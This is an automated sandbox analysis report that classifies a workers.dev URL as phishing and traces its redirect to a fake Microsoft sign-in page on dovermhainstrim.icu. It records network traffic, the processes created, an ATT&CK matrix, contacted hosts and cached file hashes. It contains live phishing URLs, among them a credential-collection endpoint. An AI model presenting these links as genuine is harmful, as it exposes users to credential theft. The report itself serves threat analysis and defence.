      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownHTTPS traffic detected: 104.21.13.238:443 -> 192.168.2.16:49702 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.238:443 -> 192.168.2.16:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.187.31:443 -> 192.168.2.16:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.13.238:443 -> 192.168.2.16:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.16:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49751 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.16:49753 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.219.36.138:443 -> 192.168.2.16:49758 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.9.156:443 -> 192.168.2.16:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49777 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 143.198.129.211:443 -> 192.168.2.16:49778 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6244_1939338047
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6244_1939338047
      Source: classification engineClassification label: mal56.phis.win@27/17@24/165
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,3110005224580043279,10307581202711868803,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:3
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1976,i,3110005224580043279,10307581202711868803,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Drive-by Compromise      		Windows Management InstrumentationPath Interception1
      Process Injection      		1
      Masquerading      		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Extra Window Memory Injection      		1
      Process Injection      		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion      		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Extra Window Memory Injection      		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
      Ingress Tool Transfer      		Traffic DuplicationData Destruction

      Screenshots

      Download Video

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c0%Avira URL Cloudsafe

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690b6b4f3ea0f4&lang=auto0%Avira URL Cloudsafe
      https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/favicon.ico0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92690b6b4f3ea0f4/1743017239432/udH6orPBiQK-Aio0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92690b6b4f3ea0f4/1743017239427/b11b001df3e4df6e56c55deecaddd5320f067bee9f1e79c065e3a3abebc4451a/Lba_3YOgfFBLE2t0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690c198d8043fb&lang=auto0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92690c198d8043fb/1743017267269/20ef7ed6af7716c2d33dbf968f23fffc06de1674adc4fea29426c51f8039b9b8/-1Wpqa_tefiexnv0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/75863169:1743013566:8s5SCde_e_Y_rNlGSSewHykECy-1C9QdLwSuVYycC9I/92690c198d8043fb/whuvwZbUt_spxQaC6mzY5BJb.DzqfRU5VC3g7NpYCkU-1743017266-1.1.1.1-Oou4gX7mU1V32eGyTIN1Ea6G8kGUXesUAAmDyNOxg2wezKGA_LizmdbBAOLaZsO80%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92690c198d8043fb/1743017267269/Qa4rFPeeM4yObLp0%Avira URL Cloudsafe
      https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwg0%Avira URL Cloudsafe
      https://dovermhainstrim.icu/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvdmVybWhhaW5zdHJpbS5pY3UvIiwiZG9tYWluIjoiZG92ZXJtaGFpbnN0cmltLmljdSIsImtleSI6IlhNRTVmSGFWVElVRiIsInJlZiI6bnVsbCwiaWF0IjoxNzQzMDE3Mjc2LCJleHAiOjE3NDMwMTczOTZ9.A7dhC-EcPIGb2ArdizRnXGDDwF2DwmwJ_bm9_3_Qmgo0%Avira URL Cloudsafe
      https://dovermhainstrim.icu/common/GetCredentialType?mkt=en-US0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      s-part-0012.t-0009.t-msedge.net
      		13.107.246.40
      		truefalse
        		high
        cdn.jsdelivr.net.cdn.cloudflare.net
        		104.18.187.31
        		truefalse
          		high
          e329293.dscd.akamaiedge.net
          		23.209.72.9
          		truefalse
            		high
            b-0004.b-dc-msedge.net
            		13.107.9.156
            		truefalse
              		high
              challenges.cloudflare.com
              		104.18.94.41
              		truefalse
                		high
                e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev
                		104.21.13.238
                		truetrue
                  		unknown
                  www.google.com
                  		142.251.35.164
                  		truefalse
                    		high
                    a1894.dscb.akamai.net
                    		23.219.36.138
                    		truefalse
                      		high
                      dovermhainstrim.icu
                      		143.198.129.211
                      		truefalse
                        		unknown
                        cdn.jsdelivr.net
                        		unknown
                        		unknownfalse
                          		high
                          identity.nel.measure.office.net
                          		unknown
                          		unknownfalse
                            		high
                            portal.microsoftonline.com
                            		unknown
                            		unknownfalse
                              		high
                              aadcdn.msftauth.net
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82ctrue
                                  		unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv75KWu00x_j8ePxwWqZoxHl0023scJz5x5keh3mFGQO4-1743017238-1.3.1.1-jx_ft8_17g_0aYlijdJ.MKowAo7nzTG5WB5RG6S_jWw/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/failure_retry/normal/auto/false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                    		high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/75863169:1743013566:8s5SCde_e_Y_rNlGSSewHykECy-1C9QdLwSuVYycC9I/92690c198d8043fb/whuvwZbUt_spxQaC6mzY5BJb.DzqfRU5VC3g7NpYCkU-1743017266-1.1.1.1-Oou4gX7mU1V32eGyTIN1Ea6G8kGUXesUAAmDyNOxg2wezKGA_LizmdbBAOLaZsO8false
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92690b6b4f3ea0f4/1743017239432/udH6orPBiQK-Aiofalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92690c198d8043fb/1743017267269/20ef7ed6af7716c2d33dbf968f23fffc06de1674adc4fea29426c51f8039b9b8/-1Wpqa_tefiexnvfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+estfalse
                                      		high
                                      https://cdn.jsdelivr.net/gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.jsfalse
                                        		high
                                        https://dovermhainstrim.icu/?sign=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2RvdmVybWhhaW5zdHJpbS5pY3UvIiwiZG9tYWluIjoiZG92ZXJtaGFpbnN0cmltLmljdSIsImtleSI6IlhNRTVmSGFWVElVRiIsInJlZiI6bnVsbCwiaWF0IjoxNzQzMDE3Mjc2LCJleHAiOjE3NDMwMTczOTZ9.A7dhC-EcPIGb2ArdizRnXGDDwF2DwmwJ_bm9_3_Qmgofalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/favicon.icofalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/92690b6b4f3ea0f4/1743017239427/b11b001df3e4df6e56c55deecaddd5320f067bee9f1e79c065e3a3abebc4451a/Lba_3YOgfFBLE2tfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                          		high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690c198d8043fb&lang=autofalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                            		high
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92690b6b4f3ea0f4&lang=autofalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/92690c198d8043fb/1743017267269/Qa4rFPeeM4yObLpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+wstfalse
                                              		high
                                              https://portal.microsoftonline.com/Prefetch/Prefetch.aspxfalse
                                                		high
                                                https://dovermhainstrim.icu/common/GetCredentialType?mkt=en-USfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.21.13.238
                                                		e23a311b.5f438d8b1fa34021ffea2c2f.workers.devUnited States
                                                		13335CLOUDFLARENETUStrue
                                                1.1.1.1
                                                		unknownAustralia
                                                		13335CLOUDFLARENETUSfalse
                                                13.107.246.40
                                                		s-part-0012.t-0009.t-msedge.netUnited States
                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                142.250.65.174
                                                		unknownUnited States
                                                		15169GOOGLEUSfalse
                                                104.18.187.31
                                                		cdn.jsdelivr.net.cdn.cloudflare.netUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                20.189.173.6
                                                		unknownUnited States
                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                104.18.94.41
                                                		challenges.cloudflare.comUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                172.253.63.84
                                                		unknownUnited States
                                                		15169GOOGLEUSfalse
                                                104.18.95.41
                                                		unknownUnited States
                                                		13335CLOUDFLARENETUSfalse
                                                142.250.80.99
                                                		unknownUnited States
                                                		15169GOOGLEUSfalse
                                                23.219.36.138
                                                		a1894.dscb.akamai.netUnited States
                                                		20940AKAMAI-ASN1EUfalse
                                                20.190.151.67
                                                		unknownUnited States
                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                13.107.9.156
                                                		b-0004.b-dc-msedge.netUnited States
                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                142.251.35.164
                                                		www.google.comUnited States
                                                		15169GOOGLEUSfalse
                                                143.198.129.211
                                                		dovermhainstrim.icuUnited States
                                                		15557LDCOMNETFRfalse
                                                142.250.65.202
                                                		unknownUnited States
                                                		15169GOOGLEUSfalse

                                                Private

                                                IP
                                                192.168.2.16
                                                192.168.2.5

                                                General Information

                                                Joe Sandbox version:42.0.0 Malachite
                                                Analysis ID:1649488
                                                Start date and time:2025-03-26 20:26:41 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                Sample URL:https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • EGA enabled
                                                Analysis Mode:stream
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal56.phis.win@27/17@24/165
                                                • Exclude process from analysis (whitelisted): svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 142.250.65.174, 142.250.80.99, 172.253.63.84, 142.251.32.110
                                                • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&amp;umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&amp;auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82c

                                                Created / dropped Files

                                                Chrome Cache Entry: 63

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:GIF image data, version 89a, 352 x 3
                                                Category:downloaded
                                                Size (bytes):3620
                                                Entropy (8bit):6.867828878374734
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://dovermhainstrim.icu/aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif
                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...

                                                Chrome Cache Entry: 65

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (3937)
                                                Category:downloaded
                                                Size (bytes):5270
                                                Entropy (8bit):5.474400542516616
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:7B30772ECC161EDE21216D4430829ACB
                                                SHA1:1323174C192B1E970C4D8AD2D0E95032364C09C6
                                                SHA-256:4CABA20287EBAA975B3F24090C94A9CAEA10C880B692AC654456900D23996757
                                                SHA-512:8BC650C655F67F2D9F56503F3E45051F066C03C51ED8F46DF018D2DA9F0B87734199DE51E1A3366D71DBD6823E64B71F75F81BDA62D3282B79A4D3234E5B2FDF
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://cdn.jsdelivr.net/gh/Joe12387/detectIncognito@main/dist/es5/detectIncognito.min.js
                                                Preview:/*!. *. * detectIncognito v1.3.7. *. * https://github.com/Joe12387/detectIncognito. *. * MIT License. *. * Copyright (c) 2021 - 2025 Joe Rutkowski <Joe@dreggle.com>. *. * Permission is hereby granted, free of charge, to any person obtaining a copy. * of this software and associated documentation files (the "Software"), to deal. * in the Software without restriction, including without limitation the rights. * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. * copies of the Software, and to permit persons to whom the Software is. * furnished to do so, subject to the following conditions:. *. * The above copyright notice and this permission notice shall be included in all. * copies or substantial portions of the Software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. * AUTHOR

                                                Chrome Cache Entry: 67

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (48122)
                                                Category:downloaded
                                                Size (bytes):48123
                                                Entropy (8bit):5.342998089666478
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:EA38BDA3C117E2FE01BD862003357394
                                                SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                                                Chrome Cache Entry: 68

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):689016
                                                Entropy (8bit):4.210696031972732
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:3B72E939A304CE05F0CEAB4A0AC39DD9
                                                SHA1:B2CFD3CB1BD0EE53C795E040063D0F55F544D939
                                                SHA-256:CC58721894324D6F6F53B7FE4CB0D08F923AA75E52506C0A58D29E4390B7CEDD
                                                SHA-512:F4AF43BA51B76496C98A30F06D9903440C4957E18F82B09D2B9C706CAD5939446D8BAA4353FD0620A2F68CEA79878824CD2313594997F0F8403C13FF767E6112
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://dovermhainstrim.icu/aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_GjP1RdcVSKf6ASC7mgkR1g2.js
                                                Preview:!(function (e) {. function n(n) {. for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++). (i = o[s]),. Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]),. (a[i] = 0);. for (t in r) Object.prototype.hasOwnProperty.call(r, t) && (e[t] = r[t]);. for (d && d(n); c.length; ) c.shift()();. }. var t,. i = {},. a = { 22: 0 };. function o(n) {. if (i[n]) return i[n].exports;. var t = (i[n] = { i: n, l: !1, exports: {} });. return e[n].call(t.exports, t, t.exports, o), (t.l = !0), t.exports;. }. Function.prototype.bind ||. ((t = Array.prototype.slice),. (Function.prototype.bind = function (e) {. if ("function" != typeof this). throw new TypeError(. "Function.prototype.bind - what is trying to be bound is not callable". );. var n = t.call(arguments, 1),. i = n.length,. a = this,. o = function () {},. r = function () {. return (.

                                                Chrome Cache Entry: 71

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:downloaded
                                                Size (bytes):28
                                                Entropy (8bit):4.307354922057605
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCSUA-vmWZbFMEgUN0VtRUhIFDVd69_0hs1fqvvu-2Mw=?alt=proto
                                                Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=

                                                Chrome Cache Entry: 72

                                                Download File
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                Category:downloaded
                                                Size (bytes):673
                                                Entropy (8bit):7.6596900876595075
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:0E176276362B94279A4492511BFCBD98
                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
